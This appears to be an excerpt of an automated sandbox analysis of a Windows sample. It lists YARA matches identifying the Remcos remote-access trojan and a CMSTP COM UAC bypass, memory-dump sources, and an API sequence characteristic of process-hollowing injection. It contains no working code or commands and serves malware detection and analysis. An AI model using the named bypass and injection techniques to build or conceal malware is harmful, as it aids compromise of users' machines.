Source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPE  Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.LdSbZG1iH6.exe.491ec58.1.raw.unpack, type: UNPACKEDPE  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.LdSbZG1iH6.exe.491ec58.1.raw.unpack, type: UNPACKEDPE  Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.raw.unpack, type: UNPACKEDPE  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.raw.unpack, type: UNPACKEDPE  Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY  Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY  Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: LdSbZG1iH6.exe PID: 7276, type: MEMORYSTR  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: LdSbZG1iH6.exe PID: 7748, type: MEMORYSTR  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: DGlxtFUfY.exe PID: 7840, type: MEMORYSTR  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_00401806 NtdllDefWindowProc_W
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_004018C0 NtdllDefWindowProc_W
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_004016FD NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_004017B7 NtdllDefWindowProc_A
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 0_2_00F8D63C
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 0_2_059BC9D0
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 0_2_059B7418
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 0_2_059B7428
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 0_2_059B47E7
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 0_2_059B6730
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 0_2_059B6720
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 0_2_059B62F8
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 0_2_059B62E8
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 0_2_059B5EB2
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 0_2_059B5EC0
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 0_2_059B4818
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 0_2_07A3D708
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 0_2_07A3DCFE
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 0_2_07A3DC28
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 0_2_07A3AA60
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 0_2_07A3A7B8
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 0_2_07A3A7C8
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 0_2_07A3D6FB
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 0_2_07A3DC1B
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_0043706A
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_00414005
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_0043E11C
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_004541D9
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_004381E8
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_0041F18B
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_00446270
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_0043E34B
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_004533AB
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_0042742E
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_00437566
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_0043E5A8
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_004387F0
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_0043797E
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_004339D7
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_0044DA49
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_00427AD7
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_0041DBF3
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_00427C40
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_00437DB3
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_00435EEB
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_0043DEED
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_00426E9F
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 10_2_00D0D63C
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 10_2_06C4D708
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 10_2_06C4DCFE
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 10_2_06C4DC28
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 10_2_06C4AA60
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 10_2_06C4D6FA
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 10_2_06C4A7C8
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 10_2_06C4A7B8
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 10_2_06C4DC1A
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 10_2_06DDBC50
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 10_2_06DD5EC0
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 10_2_06DD5EB1
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 10_2_06DD6730
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 10_2_06DD6720
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 10_2_06DD7418
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 10_2_06DD7428
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 10_2_06DD62F8
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 10_2_06DD62E8
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 10_2_06DD4818
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 14_2_10017194
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 14_2_1000B5C1
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_0044B040
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_0043610D
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_00447310
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_0044A490
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_0040755A
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_0043C560
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_0044B610
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_0044D6C0
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_004476F0
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_0044B870
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_0044081D
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_00414957
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_004079EE
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_00407AEB
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_0044AA80
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_00412AA9
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_00404B74
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_00404B03
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_0044BBD8
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_00404BE5
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_00404C76
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_00415CFE
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_00416D72
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_00446D30
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_00446D8B
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_00406E8F
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_00405038
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_0041208C
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_004050A9
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_0040511A
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_0043C13A
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_004051AB
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_00449300
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_0040D322
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_0044A4F0
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_0043A5AB
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_00413631
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_00446690
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_0044A730
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_004398D8
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_004498E0
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_0044A886
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_0043DA09
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_00438D5E
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_00449ED0
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_0041FE83
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_00430F54
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: String function: 00402093 appears 50 times
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: String function: 00434801 appears 41 times
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: String function: 00401E65 appears 34 times
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Code function: String function: 00434E70 appears 54 times
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Code function: String function: 004169A7 appears 87 times
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Code function: String function: 0044DB70 appears 41 times
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Code function: String function: 004165FF appears 35 times
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Code function: String function: 00422297 appears 42 times
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Code function: String function: 00444B5A appears 37 times
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Code function: String function: 00413025 appears 79 times
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Code function: String function: 00416760 appears 69 times
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6948 -s 12
                      Source: LdSbZG1iH6.exe, 00000000.00000000.1924856255.000000000094A000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameZPyJ.exe4 vs LdSbZG1iH6.exe
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1996272245.0000000007A50000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs LdSbZG1iH6.exe
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1987017480.000000000107E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs LdSbZG1iH6.exe
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1995759921.0000000007820000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs LdSbZG1iH6.exe
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs LdSbZG1iH6.exe
                      Source: LdSbZG1iH6.exe | Binary or memory string: OriginalFilenameZPyJ.exe4 vs LdSbZG1iH6.exe
                      Source: LdSbZG1iH6.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.2.LdSbZG1iH6.exe.491ec58.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.LdSbZG1iH6.exe.491ec58.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
